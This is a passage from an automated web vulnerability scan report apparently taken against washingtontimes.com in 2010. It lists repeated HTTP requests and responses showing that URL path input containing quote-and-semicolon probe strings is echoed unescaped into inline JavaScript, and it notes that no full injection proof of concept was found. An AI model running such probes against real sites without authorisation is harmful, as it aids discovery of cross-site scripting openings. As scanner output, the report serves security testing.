Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accountsdf994"%3b08591c70a07/password/change/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14550 Date: Mon, 13 Dec 2010 21:24:11 GMT X-Varnish: 570571751 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="accountsdf994";08591c70a07"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e4ac"%3bcab35ec224d was submitted in the REST URL parameter 1. This input was echoed as 1e4ac";cab35ec224d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accounts1e4ac"%3bcab35ec224d/profile/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14755 Date: Mon, 13 Dec 2010 21:23:52 GMT X-Varnish: 570571221 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="accounts1e4ac";cab35ec224d"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eecad'%3b301ef79e293 was submitted in the REST URL parameter 1. This input was echoed as eecad';301ef79e293 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accountseecad'%3b301ef79e293/profile/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14725 Date: Mon, 13 Dec 2010 21:23:54 GMT X-Varnish: 570571277 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed177'%3b165bc4c6b25 was submitted in the REST URL parameter 1. This input was echoed as ed177';165bc4c6b25 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bloged177'%3b165bc4c6b25/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14729 Date: Mon, 13 Dec 2010 21:23:12 GMT X-Varnish: 570570028 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17136"%3b20319022c1a was submitted in the REST URL parameter 1. This input was echoed as 17136";20319022c1a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog17136"%3b20319022c1a/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14753 Date: Mon, 13 Dec 2010 21:23:09 GMT X-Varnish: 570569990 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... script"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="blog17136";20319022c1a"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c195b'%3bc0dba48e970 was submitted in the REST URL parameter 1. This input was echoed as c195b';c0dba48e970 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogc195b'%3bc0dba48e970/inside-politics/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14729 Date: Mon, 13 Dec 2010 21:26:24 GMT X-Varnish: 570575142 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a5c6"%3b8a2ba5e08a was submitted in the REST URL parameter 1. This input was echoed as 2a5c6";8a2ba5e08a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog2a5c6"%3b8a2ba5e08a/inside-politics/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14731 Date: Mon, 13 Dec 2010 21:26:22 GMT X-Varnish: 570575089 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... script"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="blog2a5c6";8a2ba5e08a"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7acb4"%3b18b40a71e01 was submitted in the REST URL parameter 1. This input was echoed as 7acb4";18b40a71e01 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture7acb4"%3b18b40a71e01/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14583 Date: Mon, 13 Dec 2010 21:33:10 GMT X-Varnish: 570583294 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culture7acb4";18b40a71e01"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abed6'%3bb088e9b90c9 was submitted in the REST URL parameter 1. This input was echoed as abed6';b088e9b90c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cultureabed6'%3bb088e9b90c9/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14610 Date: Mon, 13 Dec 2010 21:33:25 GMT X-Varnish: 570583883 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41fe8'%3be3c1f7b0d5a was submitted in the REST URL parameter 1. This input was echoed as 41fe8';e3c1f7b0d5a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture41fe8'%3be3c1f7b0d5a/entertainment/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14744 Date: Mon, 13 Dec 2010 21:33:11 GMT X-Varnish: 570583332 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f16d1"%3b47ced2227c0 was submitted in the REST URL parameter 1. This input was echoed as f16d1";47ced2227c0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturef16d1"%3b47ced2227c0/entertainment/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14569 Date: Mon, 13 Dec 2010 21:32:40 GMT X-Varnish: 570582914 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culturef16d1";47ced2227c0"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85e79'%3b5604df38ad8 was submitted in the REST URL parameter 1. This input was echoed as 85e79';5604df38ad8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture85e79'%3b5604df38ad8/gift-guide/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14744 Date: Mon, 13 Dec 2010 21:34:02 GMT X-Varnish: 570584602 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34565"%3b2a99bf3ed93 was submitted in the REST URL parameter 1. This input was echoed as 34565";2a99bf3ed93 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture34565"%3b2a99bf3ed93/gift-guide/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14569 Date: Mon, 13 Dec 2010 21:33:42 GMT X-Varnish: 570584288 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culture34565";2a99bf3ed93"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf5e"%3b26c20f51f8b was submitted in the REST URL parameter 1. This input was echoed as faf5e";26c20f51f8b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturefaf5e"%3b26c20f51f8b/home-living/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:33:17 GMT X-Varnish: 570583472 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culturefaf5e";26c20f51f8b"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f11a1'%3b190d1711d51 was submitted in the REST URL parameter 1. This input was echoed as f11a1';190d1711d51 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturef11a1'%3b190d1711d51/home-living/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:33:40 GMT X-Varnish: 570584254 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd2ad'%3b9c270c6ce97 was submitted in the REST URL parameter 1. This input was echoed as cd2ad';9c270c6ce97 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturecd2ad'%3b9c270c6ce97/technology/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:33:09 GMT X-Varnish: 570583260 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8247b"%3bb66b6571254 was submitted in the REST URL parameter 1. This input was echoed as 8247b";b66b6571254 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture8247b"%3bb66b6571254/technology/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14751 Date: Mon, 13 Dec 2010 21:32:35 GMT X-Varnish: 570582785 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culture8247b";b66b6571254"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad218'%3bda6d13205cc was submitted in the REST URL parameter 1. This input was echoed as ad218';da6d13205cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culturead218'%3bda6d13205cc/the-list/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14768 Date: Mon, 13 Dec 2010 21:34:11 GMT X-Varnish: 570585060 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ae67"%3b0b96abee831 was submitted in the REST URL parameter 1. This input was echoed as 1ae67";0b96abee831 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture1ae67"%3b0b96abee831/the-list/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:33:59 GMT X-Varnish: 570584779 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="culture1ae67";0b96abee831"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4857"%3be27ffee5031 was submitted in the REST URL parameter 1. This input was echoed as b4857";e27ffee5031 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cultureb4857"%3be27ffee5031/travel/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:32:41 GMT X-Varnish: 570582940 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="cultureb4857";e27ffee5031"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f67d'%3b02dd9b7c247 was submitted in the REST URL parameter 1. This input was echoed as 7f67d';02dd9b7c247 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture7f67d'%3b02dd9b7c247/travel/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14744 Date: Mon, 13 Dec 2010 21:33:26 GMT X-Varnish: 570583644 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a5b8"%3b0ca217d819c was submitted in the REST URL parameter 1. This input was echoed as 2a5b8";0ca217d819c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer-service2a5b8"%3b0ca217d819c/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14772 Date: Mon, 13 Dec 2010 21:39:08 GMT X-Varnish: 570592408 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... dow.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="customer-service2a5b8";0ca217d819c"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac4f2'%3b00651201ea was submitted in the REST URL parameter 1. This input was echoed as ac4f2';00651201ea in the application's response.
